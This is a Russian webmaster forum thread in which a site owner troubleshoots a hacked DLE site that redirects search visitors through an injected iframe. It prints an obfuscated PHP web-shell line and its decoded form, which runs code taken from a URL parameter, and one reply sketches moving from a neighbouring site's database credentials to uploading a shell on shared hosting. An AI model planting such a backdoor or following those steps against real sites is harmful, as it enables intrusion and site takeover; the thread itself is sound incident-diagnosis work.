[Вопрос] Соединение было сброшено

[noggano77777]

Когда я перехожу с поиска Яндекса или Гугла, то сайт грузится, а затем сбрасывается. Когда захожу с закладок или сайта, то все нормально.

Вот если переходить на сайт с ПС.

Пример:Про звед (сбрасывает)

Если аходить на сайт без ПС.

Пример:Про звезд

Как исправить ?

[jakal]

может что то с ЧПУ ?
потому как на форум зайти с поиска то норм,
а сайт чего то перебрасывает, скорей всего ЧПУ, если не стоит какого то скрипта там.

[old]

Там редирект на IFRAME

view-source:http://secrecy.mooo.com/?RETURN=FALSE&IFRAME=FALSE&ID=40&TYPE=G

ниже какая-то партнерка

<tbody>
<tr>
<td valign="middle">Мы в топах</td>
<td width="10"></td>
<td valign="top"><noindex></noindex><script language="javascript" async defer src="http://uno.start-adv.info/?t=b&blockids=4265"></script><noindex><!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t14.14;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--></noindex>
<noindex><!--AdLayer.Mediatarget--><script type="text/javascript">
(function(){var s = document.createElement('script');
s.setAttribute('async', 'true'); s.src =
'http://sticker.yadro.ru/ad/slider.js?place=2648;rnd='+Math.random();
document.documentElement.firstChild.appendChild(s);})();
</script><!--/AdLayer.MediaTarget--></noindex>

<td width="10"></td>
<td valign="top"><noindex><script language="javascript" async defer src="http://under.toroo.info/?t=b&blockids=6920"></script></noindex>
</tr>
</tbody>
</table>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>


<a href="http://www.sexshop-vishenka.ru/category_1046.html" target="_blank">Самое сексуальное мужское белье</a>.

</body>

</html>

смотрите что в index.php, сравните с оригинальным файлом из чистого дистрибьютива,
так же желательно посмотреть что в .htaccess

[noggano77777]

смотрите что в index.php, сравните с оригинальным файлом из чистого дистрибьютива,
так же желательно посмотреть что в .htaccess

Куда еще могли залить ифрейм ?

[old]

куда угодно, возьмите скрипт для поиска шеллов, просканьте сервер/хост, обратитесь к специалистам.

[noggano77777]

куда угодно, возьмите скрипт для поиска шеллов, просканьте сервер/хост, обратитесь к специалистам.

Просканил, толку нет. Скрипт для поиска шелов не ай-болит ?

Скажите сервис онлайн по раскадировки этого кода:

Код:

@eval(base64_decode("QGV2YWwoJF9HRVRbJ3MnXSk7"));

Он похож

[old]

можно и его

[noggano77777]

можно и его

Прочтите выше моё сообщения. Я добавил

[old]

QGV2YWwoJF9HRVRbJ3MnXSk7

Result:
@eval($_GET['s']);

[noggano77777]

Вопрос решен. Закройте тему

[jakal]

Вопрос решен. Закройте тему

Может поделитесь как решили, а то может кто еще столкнется с таким.

[noggano77777]

Может поделитесь как решили, а то может кто еще столкнется с таким.

В фале dle_js1.js был код с ифреймом на сайт

[jakal]

ясно, то есть это Ваш косяк, загрузили скрипт с iframe к себе на сайт.

[noggano77777]

ясно, то есть это Ваш косяк, загрузили скрипт с iframe к себе на сайт.

Нет, сайт был взломан

[old]

noggano77777, а Вы шелл/шеллы нашли, дыру, через которую залили шелл/айфрейм?

[jakal]

скорей всего это Вы залили себе на сайт этот скрипт dle_js1.js с "вредоносным кодом",
а что бы никто не смог Вам его залить, выставляйте правильно права на папки и файлы.

p.s. Эти все предположения исходят из-за посещаемости Вашего сайта (при такой посещаемости думаю ни у кого нету желания его взламывать)

[noggano77777]

noggano77777, а Вы шелл/шеллы нашли, дыру, через которую залили шелл/айфрейм?

Могли залить ифрейм зная бд другого сайта ?

скорей всего это Вы залили себе на сайт этот скрипт dle_js1.js с "вредоносным кодом",
а что бы никто не смог Вам его залить, выставляйте правильно права на папки и файлы.

файл был скачан с одного источника. Не могло не как

p.s. Эти все предположения исходят из-за посещаемости Вашего сайта (при такой посещаемости думаю ни у кого нету желания его взламывать)

Посещаемость была 500-700 челов в день. Потом стала такая хз из-за чего !?

[Serberg]

Могли залить ифрейм зная бд другого сайта ?

Теоретически можно, если все звезды на небе совпадут.

[noggano77777]

Теоретически можно, если все звезды на небе совпадут.

А серьезно ? Грешу на это.
В одном скрипте было паливо на имя пользователя, имя бд и пароль.

[jakal]

вот Вы сами логически подумайте, как можно через БД залить js файл? да еще если и права на папки не разрешают заливать а только просмотр?

а на счет БД

Могли залить ифрейм зная бд другого сайта ?

только в том случаи если у Вас на обеих сайтах одинаковые логин и пароль БД, и при том что тот взломщик это знал! иначе просто пробовать по всем сайтах один и тот логин и пароль подставлять что бы ломануть это тупо.

[jakal]

и залить куда в БД! а у Вас как Вы сами сказали этот iframe был в dle_js1.js
здесь без вариантов, либо Вы сами залили этот скрипт, либо кто то знал на фтп данные вот и закинул в js файл. Хотя при этом вообще мог все снести.

[noggano77777]

и залить куда в БД! а у Вас как Вы сами сказали этот iframe был в dle_js1.js
здесь без вариантов, либо Вы сами залили этот скрипт, либо кто то знал на фтп данные вот и закинул в js файл. Хотя при этом вообще мог все снести.

А если узнать бд и зайти в папку user_dle и вынуть пароли. Это вариант.
Насчет ФТП возможно. Были взломана вся сетка сайтов

[old]

Варианты
1: через какую-либо уязвимость в движке/дополнениях к нему
2: Уязвимость в версии PMA
3: Не внимательность админа, к тому что он льет туда
4: Взломали через соседей
P.S. jakal, вы ошибаетесь, имея доступ к PMA можно мини-шелл/бэкдор залить, а уж дальше и полноценный.

[Serberg]

только в том случаи если у Вас на обеих сайтах одинаковые логин и пароль БД, и при том что тот взломщик это знал! иначе просто пробовать по всем сайтах один и тот логин и пароль подставлять что бы ломануть это тупо.

Не верно.
Например, я знаю логин и пароль соседнего сайта. Открываю базу, делаю себя админом. В некоторых случаях разрешаю загрузку типов файлов (в случае с некоторыми скриптами вообще не надо получать доступ к загрузке файлов, сразу в базу лью шел). Получаю полный доступ к ФС хостинг аккаунта. Лезу в соседний сайт, заливаю скрипт и прицепляю заразу.
Но это опять при том что все заезды должны сойтись )

[apelisin]

Так и не решили проблему?
Касперский блочит сайт.